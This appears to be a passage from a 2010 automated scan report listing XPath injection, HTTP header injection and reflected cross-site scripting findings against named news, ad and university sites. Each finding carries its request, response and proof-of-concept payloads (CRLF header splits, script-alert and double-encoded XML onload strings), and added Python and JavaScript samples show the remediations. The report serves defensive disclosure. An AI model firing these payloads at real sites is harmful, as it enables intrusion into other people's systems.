User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
Request
GET /ROP/Locations.aspx?adid=10246508&advid=36689'&loc=283268&z=5 HTTP/1.1
Host: newspaperads.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Dec 2010 01:08:08 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: HW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml ...[SNIP]... res, String arg) at System.Xml.XmlTextReaderImpl.ParseRootLevelWhitespace() at System.Xml.XmlTextReaderImpl.ParseDocumentContent() at System.Xml.XmlTextReaderImpl.Read() at System.Xml.XPath.XPathDocument.LoadFromReader(XmlReader reader, XmlSpace space) at System.Xml.XPath.XPathDocument..ctor(TextReader textReader) at Travidia.Web.Generic.XpdFromString(String s) at Travidia.We ...[SNIP]...
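The following is an added example, not part of the scan report or of the newspaperads application, of the remediation above: an allow-list check on advid before it is used in an XPath predicate. Python's xml.etree.ElementTree stands in for the ASP.NET XPath APIs; it implements only a subset of XPath (no "or", no functions), so an injected predicate can only break the expression here, whereas a full XPath 1.0 engine would evaluate a payload such as ' or @loc='283268 and widen the match. The sample XML document and the ad ids in it are constructed for the example; only the parameter name advid and the single-quote probe come from the report.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample document; the real application's XML is not on the page.
ADS_XML = """<ads>
  <ad id="36689" loc="283268"><title>Winter sale</title></ad>
  <ad id="36690" loc="283268"><title>Clearance</title></ad>
</ads>"""

# An ad id is one to ten digits and nothing else. Matching the whole value
# (fullmatch) is what rules out every XPath metacharacter at once.
ADVID_RE = re.compile(r"[0-9]{1,10}")


def find_ad_unvalidated(advid: str) -> list:
    """Concatenates the raw parameter into the predicate, the pattern the
    report describes. A quote in advid leaves the predicate malformed and
    ElementTree raises SyntaxError, standing in for the .NET XPath error."""
    root = ET.fromstring(ADS_XML)
    return [a.get("id") for a in root.findall(f".//ad[@id='{advid}']")]


def find_ad_validated(advid: str) -> list:
    """Allow-list first, then build the same predicate. The value is rejected
    rather than stripped or escaped, as the remediation text asks."""
    if not ADVID_RE.fullmatch(advid):
        raise ValueError("advid must be 1-10 digits")
    root = ET.fromstring(ADS_XML)
    return [a.get("id") for a in root.findall(f".//ad[@id='{advid}']")]


def probe(lookup, advid: str) -> str:
    """Classify one request the way the scanner's heuristic does."""
    try:
        return f"ok({len(lookup(advid))})"
    except SyntaxError:        # malformed XPath: the 'XPath error message'
        return "xpath-error"
    except ValueError:
        return "rejected"


def run_demo() -> dict:
    """Maps each payload to (unvalidated outcome, validated outcome)."""
    payloads = {
        "normal":   "36689",                    # a legitimate id
        "quote":    "36689'",                   # the report's probe
        "quote_or": "36689' or @loc='283268",   # constructed widening payload
    }
    return {name: (probe(find_ad_unvalidated, v), probe(find_ad_validated, v))
            for name, v in payloads.items()}


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:9} unvalidated={outcome[0]:12} validated={outcome[1]}")
```

The validated lookup builds an identical expression, but only ever from a value that cannot contain a quote, slash, bracket or any other XPath metacharacter, so the expression's structure is fixed before the user's data goes in.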
3. HTTP header injection
There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload a391a%0d%0a9258e43f385 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 29340%0d%0abd03a24fa85 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /29340%0d%0abd03a24fa85/ HTTP/1.1
Host: www.mtgeinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 08 Dec 2010 07:26:03 GMT
Content-length: 122
Content-type: text/html
Location: http://www.infotrak.com/29340
bd03a24fa85/
Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
The value of the callback request parameter is copied into the Location response header. The payload 9f1fd%0d%0ab975c48afd3 was submitted in the callback parameter. This caused a response containing an injected HTTP header.
Request
GET /syndication/get_widget.js?callback=9f1fd%0d%0ab975c48afd3&output=json&location=http%3A%2F%2Fwww.mercurynews.com%2F&timestamp=1291762313737&appId.0=d2e71d0a-2cb3-4fbd-bfc0-b3f04d8697eb HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily
Date: Wed, 08 Dec 2010 00:54:16 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/d2e71d0a-2cb3-4fbd-bfc0-b3f04d8697eb/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/8c01d0fffcdb01f1832ae8509cc156b14adb46640000012cb8ee8fe1/u/1/?callback=9f1fd
b975c48afd3
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0
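The following is an added example, not part of the scan report or of the widgetserver.com application, that reproduces the callback instance above and the remediation for it. A vulnerable builder copies the URL-decoded parameter into the Location header, and a small header parser (written the way a browser or caching proxy splits a response, one header per CRLF-terminated line) shows the report's payload ending the Location value early and the attacker's text starting a new header line. The hardened builder allow-lists the value, which also enforces the remediation's minimum of rejecting every byte below 0x20. The redirect target host, the second "X-Injected" payload and the benign value are constructed for the example; only the report's payload 9f1fd%0d%0ab975c48afd3 comes from the page.

```python
import re
import urllib.parse

# A JSONP callback is a short identifier; anything else is refused.
CALLBACK_RE = re.compile(r"[A-Za-z0-9_.]{1,64}")
REDIRECT_BASE = "http://cdn.example.invalid/syndication/?callback="  # constructed


def build_redirect_vulnerable(callback_param: str) -> bytes:
    """Copies the URL-decoded parameter straight into Location, as the
    report's response shows. %0d%0a becomes a real CR LF inside the header."""
    value = urllib.parse.unquote(callback_param)
    return (f"HTTP/1.1 302 Moved Temporarily\r\nLocation: {REDIRECT_BASE}{value}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def build_redirect_safe(callback_param: str) -> bytes:
    """Validates the decoded value against the allow-list before it is used.
    The pattern admits no control characters, so CR and LF can never reach
    the header; failing input is rejected, not stripped."""
    value = urllib.parse.unquote(callback_param)
    if not CALLBACK_RE.fullmatch(value):
        raise ValueError("callback must be a short alphanumeric token")
    return (f"HTTP/1.1 302 Moved Temporarily\r\nLocation: {REDIRECT_BASE}{value}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def parse_headers(raw_response: bytes) -> dict:
    """Minimal header parse: the status line, then one header per CRLF line,
    name before the first colon. This is the view a proxy or browser takes."""
    head, _, _body = raw_response.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return headers


def run_demo() -> dict:
    """Parsed headers from the vulnerable builder, and the safe builder's
    verdict, for the report's payload, a constructed full header, and a benign value."""
    payloads = {
        "report":  "9f1fd%0d%0ab975c48afd3",      # the report's payload
        "header":  "9f1fd%0d%0aX-Injected:%201",  # constructed: a complete header
        "benign":  "cb123",                        # constructed legitimate callback
    }
    vulnerable = {name: parse_headers(build_redirect_vulnerable(p))
                  for name, p in payloads.items()}
    safe = {}
    for name, p in payloads.items():
        try:
            safe[name] = parse_headers(build_redirect_safe(p))
        except ValueError:
            safe[name] = "rejected"
    return {"vulnerable": vulnerable, "safe": safe}


if __name__ == "__main__":
    for side, results in run_demo().items():
        for name, parsed in results.items():
            print(f"{side:10} {name:7} {parsed}")
```

With the report's payload the parsed Location ends at "9f1fd" and "b975c48afd3" becomes a header line of its own, exactly as the response above shows; the constructed second payload turns that line into a complete X-Injected header. Note that a proxy which caches the split response under another URL is the poisoning scenario described in the issue background, and that nothing in the parser needs to be clever for the split to happen, which is why the header value must be validated before it is written.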
4. Cross-site scripting (reflected)
There are 320 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
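The two defensive layers above, worked through against the reflection contexts that appear later in this report (a numeric index echoed into an unquoted JavaScript expression, an ID echoed into a double-quoted JavaScript string, a query title echoed between tags, and a parameter name echoed into a quoted attribute). This is an added example, not code from the scan report or from any of the scanned applications; the fragment layout and the helper names (renderFragment, drainQueue) are assumptions made for the example.

```javascript
// Added example: context-aware output encoding plus input validation, applied
// to the reflection points this report records. Not code from the scan report
// or from any scanned application; page layout and helper names are assumed.

// Metacharacters named in the remediation text (< > " ' =) plus &, which must
// be encoded so that already-encoded output cannot be decoded a second time.
const HTML_META = /[&<>"'=]/g;

// Layer 2a: encode for text between tags and for quoted attribute values.
function encodeForHtml(value) {
  return String(value).replace(
    HTML_META,
    (c) => "&#x" + c.charCodeAt(0).toString(16) + ";"
  );
}

// Layer 2b: encode for a double-quoted JavaScript string literal. Every
// character outside [A-Za-z0-9] becomes \xHH or \uHHHH, so neither a quote
// nor a </script> sequence can end the literal or the script element.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Layer 1: validate on arrival against what the field is expected to hold.
// startIndex / endIndex are echoed into an unquoted JavaScript expression in
// this report, so nothing but a short run of digits may reach that context.
// Invalid input is rejected (here, by throwing), not cleaned up.
function requireIndex(raw, name) {
  if (typeof raw !== "string" || !/^[0-9]{1,9}$/.test(raw)) {
    throw new Error("Invalid value for " + name);
  }
  return Number(raw);
}

// Builds the fragment of the response that contains the four reflection
// contexts seen in this report: unquoted JS expression, quoted JS string,
// text between tags, and a quoted attribute in a <meta> tag.
function renderFragment(params) {
  const start = requireIndex(params.startIndex, "startIndex");
  const end = requireIndex(params.endIndex, "endIndex");
  return [
    '<meta property="og:url" content="/?' + encodeForHtml(params.extraParamName) + '=1" />',
    "<p>" + encodeForHtml(params.queryTitle) + "</p>",
    "<script>var range = [" + start + ", " + end + "];",
    'drainQueue("' + encodeForJsString(params.uid) + '");</script>',
  ].join("\n");
}

// Constructed sample input reusing the payloads recorded in this report.
const samplePayloads = {
  startIndex: "1",
  endIndex: "50",
  uid: "fC2x6y5eJIhcKcBK_187469609f313a<script>alert(1)</script>ecc40386835",
  queryTitle: "53d9b<script>alert(1)</script>da1690f1739",
  extraParamName: 'd65aa"><script>alert(1)</script>dd1472c7339',
};

console.log(renderFragment(samplePayloads));
```

The numeric parameters are the only values allowed into an unquoted script context, and they get there as numbers produced by the validator rather than as strings; everything else is encoded for the exact context it is written into, so a payload that is valid for one context (a closing quote, a closing tag) is inert in all of them.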
The value of the CustomBoolean|isNational|true&query request parameter is copied into the HTML document as plain text between tags. The payload 7bbfc<script>alert(1)</script>50864528a8a was submitted in the CustomBoolean|isNational|true&query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note, however, that the response below is served with Content-Type: text/plain; a browser that honours the declared type will display the injected markup rather than execute it, so exploitability depends on the client sniffing the body as HTML. The unencoded reflection should still be fixed.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn&startIndex=1&endIndex=50&CustomBoolean|isNational|true&query=7bbfc<script>alert(1)</script>50864528a8a&query=ContentCustomText|ExcludeStationGroups|,&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss&query=Categories|By%20Section/World HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 500 Internal Server Error Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:49 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid01 (squid/3.0.STABLE23) Connection: close
"7bbfc<script>alert(1)</script>50864528a8a" is an unknown query title.
The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload 31fd3<script>alert(1)</script>fea3eeff07b was submitted in the PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with the previous finding, the response is served as text/plain (here with a 404 status), so execution depends on the browser treating the body as HTML; the reflection should nonetheless be encoded or, better, rejected by length and character-set validation.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn31fd3<script>alert(1)</script>fea3eeff07b&startIndex=1&endIndex=50&CustomBoolean|isNational|true&query=ContentCustomText|ExcludeDMAs|,&query=ContentCustomText|ExcludeStationGroups|,&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:39 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid02 (squid/3.0.STABLE23) Connection: close
The PID looks like it was cut-off ("Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn31fd3<script>alert(1)</script>fea3eeff07b"). This PID is 73 character(s) long, when it should be 32 characters long.
The value of the endIndex request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15a3e%3balert(1)//0265a4744a4 was submitted in the endIndex parameter. This input was echoed as 15a3e;alert(1)//0265a4744a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response is served as text/plain, so the "JavaScript expression" context is the scanner's classification of the echo rather than something the browser will evaluate directly; the remedy is the same either way, since a numeric parameter should be validated as an integer before it is used or echoed.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn&startIndex=1&endIndex=5015a3e%3balert(1)//0265a4744a4&CustomBoolean|isNational|true&query=ContentCustomText|ExcludeDMAs|,&query=ContentCustomText|ExcludeStationGroups|,&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 500 Internal Server Error Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:45 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid03 (squid/3.0.STABLE23) Connection: close
Invalid value for endIndex: 5015a3e;alert(1)//0265a4744a4
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 53d9b<script>alert(1)</script>da1690f1739 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response is again served as text/plain, so execution depends on the browser sniffing the body as HTML; the reflection is unencoded and should be fixed regardless.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn&startIndex=1&endIndex=50&CustomBoolean|isNational|true&query=ContentCustomText|ExcludeDMAs|,&query=53d9b<script>alert(1)</script>da1690f1739&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss&query=Categories|By%20Section/World HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 500 Internal Server Error Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:59 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid03 (squid/3.0.STABLE23) Connection: close
"53d9b<script>alert(1)</script>da1690f1739" is an unknown query title.
The value of the startIndex request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 646e4%3balert(1)//cbee911c329 was submitted in the startIndex parameter. This input was echoed as 646e4;alert(1)//cbee911c329 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As for endIndex above, the response is text/plain and the echo is an error message, so the script context is the scanner's classification; validating startIndex as an integer removes the issue.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn&startIndex=1646e4%3balert(1)//cbee911c329&endIndex=50&CustomBoolean|isNational|true&query=ContentCustomText|ExcludeDMAs|,&query=ContentCustomText|ExcludeStationGroups|,&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 500 Internal Server Error Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:42 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid02 (squid/3.0.STABLE23) Connection: close
Invalid value for startIndex: 1646e4;alert(1)//cbee911c329
The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e001c%3balert(1)//b78489c2671 was submitted in the c parameter. This input was echoed as e001c;alert(1)//b78489c2671 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /json?c=OXM_51314736366e001c%3balert(1)//b78489c2671&pid=26262ed9-a045-4821-ad98-1310bdc31ad4&s=160x600&f=1&cid=oxpv1%3A34-632-1929-1220-3481&hrid=dce2c268a43ae4acdfbf825bd6a06a66-1291762417&url=http%3A%2F%2Fwww.mercurynews.com%2Frss HTTP/1.1 Host: bid.openx.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/rss Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: p=1288929081; i=fbf7d168-c8b8-40a4-925d-de40517e7bc2
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=iso-8859-1 Cache-Control: no-cache, must-revalidate P3P: CP="CUR ADM OUR NOR STA NID" Connection: close Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Set-Cookie: s=93ecc92c-0d95-43aa-b8fe-8bee6a58481f; version=1; path=/; domain=.openx.net; Set-Cookie: p=1291762937; version=1; path=/; domain=.openx.net; max-age=63072000;
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload d7cfe%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb0bc9c805d2 was submitted in the REST URL parameter 18. This input was echoed as d7cfe<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b0bc9c805d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/a799b2a11500968f70468142cdb62dae0dd701250000012cb7e9051ad7cfe%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb0bc9c805d2/u/1/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://widgetserver.com/syndication/flash/wrapper/InsertWidget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Tue, 07 Dec 2010 23:08:39 GMT Expires: Fri, 10 Dec 2010 23:07:39 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 6365
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7155<a>5ce25a3d4a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951b7155<a>5ce25a3d4a5/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/a799b2a11500968f70468142cdb62dae0dd701250000012cb7e9051a/u/1/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://widgetserver.com/syndication/flash/wrapper/InsertWidget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/xml;charset=UTF-8 Date: Tue, 07 Dec 2010 23:04:33 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1697
The value of the selectedProgramStreamId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76947"><script>alert(1)</script>3d7c6f7006 was submitted in the selectedProgramStreamId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ucsc/public/category/courseDetails.do?method=load&courseId=2794074&selectedCategoryId=1000075&selectedProgramAreaId=&selectedProgramStreamId=76947"><script>alert(1)</script>3d7c6f7006 HTTP/1.1 Host: courses.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:15:38 GMT Server: Apache/2.2.16 (Win32) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_jk/1.2.20 Set-Cookie: JSESSIONID=492A921086A1145C3CCE3FD0EDEA9131; Path=/ucsc Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 34669
<HTML> <HEAD> <TITLE>19001 Bioscience Business Development: Building Value | U ...[SNIP]... <a href="courseSectionInfoRequest.do;jsessionid=492A921086A1145C3CCE3FD0EDEA9131?method=load&page=EmailTo&selectedCategoryId=1000075&selectedProgramAreaId=&selectedProgramStreamId=76947"><script>alert(1)</script>3d7c6f7006"> ...[SNIP]...
